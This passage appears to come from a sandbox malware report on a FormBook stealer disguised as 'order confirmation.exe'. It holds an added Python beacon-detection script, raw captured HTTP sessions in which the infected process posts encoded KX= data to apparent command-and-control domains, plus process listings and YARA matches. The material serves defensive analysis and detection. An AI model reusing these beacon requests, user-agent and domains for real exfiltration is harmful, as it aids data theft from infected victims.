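                                                  Sessions 8 to 12 above show the injected process walking through several hosts with the same request shape: the fixed BlackBerry "BB10; Touch" User-Agent, a four-character directory path, "Connection: close", three POSTs carrying a single urlencoded KX= blob followed by a GET with KX= and one short second parameter, while the hosts answer with a hosting-level JavaScript cookie challenge, a redirect to a suspended-page CGI, or (further below) a 404. The Python triage script below is an added example, not code from the Joe Sandbox report or from the sample: it parses request/response pairs of that shape, scores each request against those traits, labels what each host answered, and groups the result per host. The embedded sessions are constructed abbreviations of the captured ones (hostnames, paths, User-Agent and the KX= field copied from the report; KX values shortened to placeholders; one made-up benign request added for contrast), and the trait names and threshold are this example's own choices rather than a published FormBook signature.

```python
"""Added example (not Joe Sandbox or sample code): triage of the FormBook-style
beacons in this report. Sample traffic below is a constructed abbreviation of
sessions 8 to 12: hosts, paths, UA and the KX= field copied, KX values shortened,
plus one made-up benign request for contrast."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

UA_BB10 = ("Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ "
           "(KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+")
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")          # /4d2l/, /ogj2/, /eaqq/
CHALLENGE_RE = re.compile(r'slowAES\.decrypt\(|document\.cookie="__test=')

def parse_http(raw):
    """Split one raw HTTP message into (start line, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def beacon_features(raw_request):
    """Return (method, host, set of beacon traits) for one request."""
    start, hdr, body = parse_http(raw_request)
    method, target, _ = start.split(" ", 2)
    url, host, traits = urlsplit(target), hdr.get("host", ""), set()
    if hdr.get("user-agent") == UA_BB10:
        traits.add("ua_bb10")                 # fixed UA reused on every host
    if PATH_RE.match(url.path):
        traits.add("short_dir_path")
    if hdr.get("connection", "").lower() == "close":
        traits.add("conn_close")
    if method == "POST":
        if set(dict(parse_qsl(body, keep_blank_values=True))) == {"KX"} \
                and hdr.get("content-type") == "application/x-www-form-urlencoded":
            traits.add("kx_form_body")
        if hdr.get("origin") == f"http://{host}" and hdr.get("referer") == f"http://{host}{url.path}":
            traits.add("self_referer")        # Origin/Referer point at the beacon path
    else:
        query = dict(parse_qsl(url.query, keep_blank_values=True))
        if "KX" in query and len(query) == 2:
            traits.add("kx_query_pair")       # KX= plus one short second parameter
    return method, host, traits

def is_beacon(method, traits):
    """Threshold chosen for this example, not a published FormBook signature."""
    carrier = "kx_form_body" if method == "POST" else "kx_query_pair"
    return {"ua_bb10", "short_dir_path", "conn_close", carrier} <= traits

def classify_response(raw_response):
    """Label what each contacted host answered; decoys and dead hosts look like this."""
    status, hdr, body = parse_http(raw_response)
    code = int(status.split(" ")[1])
    if code == 200 and CHALLENGE_RE.search(body):
        return "js_cookie_challenge"          # hosting-level anti-bot gate, not a panel
    if code == 302 and "suspendedpage.cgi" in hdr.get("location", ""):
        return "hosting_suspended"
    return "not_found" if code == 404 else f"other_{code}"

def triage(sessions):
    """Group (request, response) pairs by host and count flagged beacons."""
    out = defaultdict(lambda: {"requests": 0, "beacons": 0, "responses": set()})
    for req, resp in sessions:
        method, host, traits = beacon_features(req)
        out[host]["requests"] += 1
        out[host]["beacons"] += is_beacon(method, traits)
        out[host]["responses"].add(classify_response(resp))
    return dict(out)

# --- constructed sample traffic (shapes copied from the report, payloads shortened)
def _req(method, host, path, query="", body="", ua=UA_BB10):
    lines = [f"{method} {path}{'?' + query if query else ''} HTTP/1.1", f"Host: {host}",
             "Accept-Language: en-US,en;q=0.5", "Connection: close", f"User-Agent: {ua}"]
    if method == "POST":
        lines += [f"Origin: http://{host}", f"Content-Length: {len(body)}",
                  "Content-Type: application/x-www-form-urlencoded", f"Referer: http://{host}{path}"]
    return "\r\n".join(lines) + "\r\n\r\n" + body

def _resp(status, headers, body=""):
    return "\r\n".join([f"HTTP/1.1 {status}"] + headers) + "\r\n\r\n" + body

CHALLENGE_BODY = ('<html><body><script src="/aes.js"></script><script>document.cookie='
                  '"__test="+toHex(slowAES.decrypt(c,2,a,b));</script></body></html>')
SUSPENDED = ["Connection: close", "content-type: text/html",
             "location: http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi"]
SAMPLE_SESSIONS = [
    (_req("GET", "www.canadavinreport.site", "/4d2l/", "2VqtG=K0rLevU0Wh5tIJEp&KX=ZGBp9LUV"),
     _resp("200 OK", ["Server: nginx", "Content-Type: text/html"], CHALLENGE_BODY)),
    (_req("POST", "www.phoenix88.sbs", "/ogj2/", body="KX=F/4Ipjr2NB0HQB"), _resp("302 Found", SUSPENDED)),
    (_req("POST", "www.phoenix88.sbs", "/ogj2/", body="KX=F/4Ipjr2NB0HC0"), _resp("302 Found", SUSPENDED)),
    (_req("POST", "www.phoenix88.sbs", "/ogj2/", body="KX=F/4Ipjr2NB0HC0PB"), _resp("302 Found", SUSPENDED)),
    (_req("GET", "www.phoenix88.sbs", "/ogj2/", "KX=I9QoqWaw&2VqtG=K0rLevU0Wh5tIJEp"), _resp("302 Found", SUSPENDED)),
    (_req("POST", "www.ana-silverco.shop", "/eaqq/", body="KX=AzG7TTHt"), _resp("404 Not Found", ["Server: cloudflare"])),
    (_req("GET", "www.example.com", "/index.html", ua="Mozilla/5.0 (Windows NT 10.0; rv:120.0) Firefox/120.0"),
     _resp("200 OK", ["Content-Type: text/html"], "<html></html>")),   # made-up benign control
]
```

                                                  Calling triage(SAMPLE_SESSIONS) returns one record per host with the request count, how many requests met the beacon threshold, and the set of response labels. On the traffic in this report every request from the injected process is flagged while the benign control is not, and no contacted host returns anything but a cookie challenge, a suspended-hosting redirect or a 404, so none of these sessions is a completed exchange with a live panel; the operational value is in the request side, which is the part a proxy or NDR rule can match regardless of which domain in the sample's list is currently alive.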


                                                  Session ID: 13 | Source IP: 192.168.2.8 | Source Port: 49854 | Destination IP: 104.21.90.137 | Destination Port: 80 | PID: 2648 | Process: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  Timestamp: Dec 14, 2024 13:51:29.295617104 CET | Bytes transferred: 788 | Direction: OUT | Data:
                                                  POST /eaqq/ HTTP/1.1
                                                  Host: www.ana-silverco.shop
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.ana-silverco.shop
                                                  Content-Length: 203
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.ana-silverco.shop/eaqq/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 41 7a 47 37 54 54 48 74 2b 67 39 30 4d 4a 51 36 4c 59 37 2b 31 68 58 6e 58 33 35 7a 72 6d 69 77 6a 30 78 6d 33 38 2b 2f 46 32 6b 5a 51 48 72 37 4e 73 66 69 76 31 63 54 61 38 64 4f 4e 2f 41 72 51 6b 62 4e 4a 55 64 49 4d 4d 76 33 75 54 56 6e 45 6b 6f 56 52 5a 43 4f 50 71 6c 42 53 36 71 64 54 79 54 6c 63 53 66 39 56 50 77 49 54 6d 34 64 65 44 65 44 79 73 53 4b 64 4f 4e 72 43 44 6d 31 66 49 49 70 57 73 76 45 49 42 6d 6a 52 77 62 2f 31 2f 77 31 63 61 46 6e 70 70 52 45 74 56 35 41 6b 7a 56 6d 59 6c 66 41 37 36 46 65 6d 68 46 2b 69 55 2b 70 54 69 57 31 72 45 35 35 43 45 43 4a 39 6f 54 79 46 6a 51 3d
                                                  Data Ascii: KX=AzG7TTHt+g90MJQ6LY7+1hXnX35zrmiwj0xm38+/F2kZQHr7Nsfiv1cTa8dON/ArQkbNJUdIMMv3uTVnEkoVRZCOPqlBS6qdTyTlcSf9VPwITm4deDeDysSKdONrCDm1fIIpWsvEIBmjRwb/1/w1caFnppREtV5AkzVmYlfA76FemhF+iU+pTiW1rE55CECJ9oTyFjQ=
                                                  Timestamp: Dec 14, 2024 13:51:30.429028034 CET | Bytes transferred: 904 | Direction: IN | Data:
                                                  HTTP/1.1 404 Not Found
                                                  Date: Sat, 14 Dec 2024 12:51:30 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  X-Powered-By: PHP/7.4.33
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yK8E%2B8UBoJRuCE4OSXsnnXc3Ych%2Fhv2j0OlMsLkw3cvTGlAbOmraMdY7C%2BaL8FJE5zkYyCItsvnMjLqT34%2B7QP0maBRCqbCFYYV2cBzNwZJmms%2FVTfuNAp0rowzvARfAwSqq8vqDY1Q%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8f1e5361c80043c2-EWR
                                                  Content-Encoding: gzip
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1678&rtt_var=839&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=788&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190


                                                  Session ID: 14 | Source IP: 192.168.2.8 | Source Port: 49860 | Destination IP: 104.21.90.137 | Destination Port: 80 | PID: 2648 | Process: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  Timestamp: Dec 14, 2024 13:51:31.956368923 CET | Bytes transferred: 808 | Direction: OUT | Data:
                                                  POST /eaqq/ HTTP/1.1
                                                  Host: www.ana-silverco.shop
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.ana-silverco.shop
                                                  Content-Length: 223
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.ana-silverco.shop/eaqq/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 41 7a 47 37 54 54 48 74 2b 67 39 30 4f 70 67 36 51 37 44 2b 35 52 58 6b 59 58 35 7a 35 6d 6a 59 6a 30 4e 6d 33 39 71 76 43 45 77 5a 51 6d 62 37 4d 74 66 69 73 31 63 54 51 63 64 50 44 66 41 67 51 6b 47 77 4a 56 68 49 4d 4d 72 33 75 53 6c 6e 46 55 55 57 54 4a 43 4d 61 36 6c 44 63 61 71 64 54 79 54 6c 63 53 4b 71 56 50 6f 49 54 57 49 64 59 69 65 63 38 4d 53 4a 4e 2b 4e 72 52 54 6e 38 66 49 49 78 57 74 7a 75 49 44 65 6a 52 77 4c 2f 30 75 77 32 4a 4b 46 68 32 5a 51 7a 6d 47 63 62 74 68 5a 43 59 45 62 59 38 49 78 66 6e 58 30 55 34 32 32 76 51 69 2b 65 72 48 52 50 48 7a 66 68 6e 4c 44 43 62 30 46 41 36 55 4b 6e 66 56 36 37 7a 4e 50 44 58 61 31 50 43 48 37 68
                                                  Data Ascii: KX=AzG7TTHt+g90Opg6Q7D+5RXkYX5z5mjYj0Nm39qvCEwZQmb7Mtfis1cTQcdPDfAgQkGwJVhIMMr3uSlnFUUWTJCMa6lDcaqdTyTlcSKqVPoITWIdYiec8MSJN+NrRTn8fIIxWtzuIDejRwL/0uw2JKFh2ZQzmGcbthZCYEbY8IxfnX0U422vQi+erHRPHzfhnLDCb0FA6UKnfV67zNPDXa1PCH7h
                                                  Timestamp: Dec 14, 2024 13:51:33.099092960 CET | Bytes transferred: 898 | Direction: IN | Data:
                                                  HTTP/1.1 404 Not Found
                                                  Date: Sat, 14 Dec 2024 12:51:32 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  X-Powered-By: PHP/7.4.33
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KfRJUbqGH0yvBdTV9ZcLlgsOh3ochM2JEFIPFVa2BBbnuKUaaxJWYuc4jGWuSucqHv35cCu3NSx52XfBbxdz7p7d5dQ2ghy48LpPv9ibygaW3XWJ9%2FAaOvYpnThrgozxWPwOr%2B3dbiI%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8f1e53727bec435e-EWR
                                                  Content-Encoding: gzip
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1706&rtt_var=853&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=808&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190


                                                  Session ID: 15 | Source IP: 192.168.2.8 | Source Port: 49866 | Destination IP: 104.21.90.137 | Destination Port: 80 | PID: 2648 | Process: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  Timestamp: Dec 14, 2024 13:51:34.628195047 CET | Bytes transferred: 1825 | Direction: OUT | Data:
                                                  POST /eaqq/ HTTP/1.1
                                                  Host: www.ana-silverco.shop
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.ana-silverco.shop
                                                  Content-Length: 1239
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.ana-silverco.shop/eaqq/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Ascii: KX= [TRUNCATED]
                                                  Dec 14, 2024 13:51:35.774682999 CET | 904 | IN | HTTP/1.1 404 Not Found
                                                  Date: Sat, 14 Dec 2024 12:51:35 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  X-Powered-By: PHP/7.4.33
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8d%2BxpHOsorakXoxc6p6pSeCntTTnPXUKwqtys3ACiUgOHSL7yfLWEFfSuxnqKihgQqY8GOBESJ9CuBXQbVLV6NbYw4IUrRXq%2BeejTNbcZh3LVLFNy8csV%2BuntGpBZzE%2BM2wO7HJr4oI%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8f1e53833d127293-EWR
                                                  Content-Encoding: gzip
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2099&min_rtt=2099&rtt_var=1049&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1825&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                  16 | 192.168.2.8 | 49877 | 104.21.90.137 | 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Dec 14, 2024 13:51:37.903799057 CET | 529 | OUT | GET /eaqq/?KX=NxubQmq32TFwA/AibIzR7zP/ZxBDpVn2yR9uwt+3Cm9QP0jQO/3+sgZCY8NDMJ5UVFnAF2VjMcKsp0wgFy5kYqX2P65hLvXSZ3fWNCCIV/k5d2IdbBS66sOXN5gLen/wBg==&2VqtG=K0rLevU0Wh5tIJEp HTTP/1.1
                                                  Host: www.ana-silverco.shop
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.5
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Dec 14, 2024 13:51:39.037941933 CET | 848 | IN | HTTP/1.1 404 Not Found
                                                  Date: Sat, 14 Dec 2024 12:51:38 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  X-Powered-By: PHP/7.4.33
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1FD134R3%2BCEJSevsZ9VEl5FVBIJrcxP%2FnXm3fRXbhgEAMfmmIezQ905Z1AJE%2FQOiSxybGgBVulvi1GkOX%2B1Ls16yVmupTVi3t915VSiLhSsYDizOdv9CsXN7X2rXCDfRfm6CgSm0m40%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8f1e5397aa5841af-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2211&min_rtt=2211&rtt_var=1105&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=529&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Target ID:0
                                                  Start time:07:49:28
                                                  Start date:14/12/2024
                                                  Path:C:\Users\user\Desktop\order confirmation.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\order confirmation.exe"
                                                  Imagebase:0xfd0000
                                                  File size:835'584 bytes
                                                  MD5 hash:8D4459233467BBCF973541C6B17091D7
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:07:49:37
                                                  Start date:14/12/2024
                                                  Path:C:\Users\user\Desktop\order confirmation.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\order confirmation.exe"
                                                  Imagebase:0x3a0000
                                                  File size:835'584 bytes
                                                  MD5 hash:8D4459233467BBCF973541C6B17091D7
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:07:49:37
                                                  Start date:14/12/2024
                                                  Path:C:\Users\user\Desktop\order confirmation.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\order confirmation.exe"
                                                  Imagebase:0x850000
                                                  File size:835'584 bytes
                                                  MD5 hash:8D4459233467BBCF973541C6B17091D7
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1983228417.0000000001310000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1984356146.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:8
                                                  Start time:07:50:01
                                                  Start date:14/12/2024
                                                  Path:C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe"
                                                  Imagebase:0xeb0000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2820915719.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:9
                                                  Start time:07:50:03
                                                  Start date:14/12/2024
                                                  Path:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\SearchProtocolHost.exe"
                                                  Imagebase:0xa30000
                                                  File size:340'992 bytes
                                                  MD5 hash:727FE964E574EEAF8917308FFF0880DE
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2821333990.0000000003270000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2821409903.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:moderate
                                                  Has exited:false

                                                  Target ID:10
                                                  Start time:07:50:17
                                                  Start date:14/12/2024
                                                  Path:C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe"
                                                  Imagebase:0xeb0000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2823935651.0000000004EB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:12
                                                  Start time:07:50:30
                                                  Start date:14/12/2024
                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                  Imagebase:0x7ff7d0b40000
                                                  File size:676'768 bytes
                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true


                                                    Execution Graph

                                                    Execution Coverage:10.8%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:1.5%
                                                    Total number of Nodes:200
                                                    Total number of Limit Nodes:11
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669023545.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d90000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 17fe2c70720d8dbc2f7c74cfe66b77ebca4f0d30fc6a6e1423692024b8c1d251
                                                    • Instruction ID: 45212d066d561fe5a5cae65435515a10c9f71c311b51fc58ada163804c3ce07d
                                                    • Opcode Fuzzy Hash: 17fe2c70720d8dbc2f7c74cfe66b77ebca4f0d30fc6a6e1423692024b8c1d251
                                                    • Instruction Fuzzy Hash: F5424D70A002199FDF54DFA9C89079EBBF2FF88300F14856AD44AAB355DB34AD45CBA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669023545.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d90000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9d8c37bcc8f2fd32f4ba5245d43821d8c0abb65b18272a46058704c5da6773ab
                                                    • Instruction ID: e25714d3a21acfc54ccc0af91fe94fe235d3c9dc23b604cc78b3feae425f89e6
                                                    • Opcode Fuzzy Hash: 9d8c37bcc8f2fd32f4ba5245d43821d8c0abb65b18272a46058704c5da6773ab
                                                    • Instruction Fuzzy Hash: D9225971A10219CFDF14DF68D884A9DFBB2FF85310F1585A9E909AB225DB30AD85CF90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669817607.0000000008260000.00000040.00000800.00020000.00000000.sdmp, Offset: 08260000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_8260000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 216f1db1d6ec9d73f51935c0e1aee2080bd2ea5d3998b2f74c91174dbc82a140
                                                    • Instruction ID: 52ba1d31b7a0c87ddb935bfd9352ec68354f2df96798e67d3c409a27fd56e925
                                                    • Opcode Fuzzy Hash: 216f1db1d6ec9d73f51935c0e1aee2080bd2ea5d3998b2f74c91174dbc82a140
                                                    • Instruction Fuzzy Hash: D0F1FF71711302CFE726DB75C454B6AB7F6AF89312F0444AED04ACB2A1CB34E851C761
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654639015.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1740000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6b376d5f8f2b581ea62c4e50cdef2d389a324a77d03dd8c575cdb870f4e7cff1
                                                    • Instruction ID: c9d7a177be4f4e6784f66d8b5c19256308f8489c48fb18155bd23a0c414b4050
                                                    • Opcode Fuzzy Hash: 6b376d5f8f2b581ea62c4e50cdef2d389a324a77d03dd8c575cdb870f4e7cff1
                                                    • Instruction Fuzzy Hash: E2C19B738442A29BCB05EE14CC987D5B764FB053EDB2C41CCDE452B645D32A7D8AEBA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669023545.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d90000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 95cc549808a3a865d8aead197285e64bcd8f5ef4edd7c4e28d66115c6132133e
                                                    • Instruction ID: 8a3b02a28104c204b36e375f33f054ff9ab3845d18e58c17937fa30d210cafb3
                                                    • Opcode Fuzzy Hash: 95cc549808a3a865d8aead197285e64bcd8f5ef4edd7c4e28d66115c6132133e
                                                    • Instruction Fuzzy Hash: 5BC149B1A00259DFCF25DFA5C880799FBB2BF88310F14C5AAD449AB255EB30A985CF50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a81ea3aef92d40baf5104cf185662a819bb7e94cbfd9a4a4f82a4d840cd550e
                                                    • Instruction ID: 385fb5cb638075787cb9b826aafeb1fd7ded3ac4ada9e28535a10fdcc256c47b
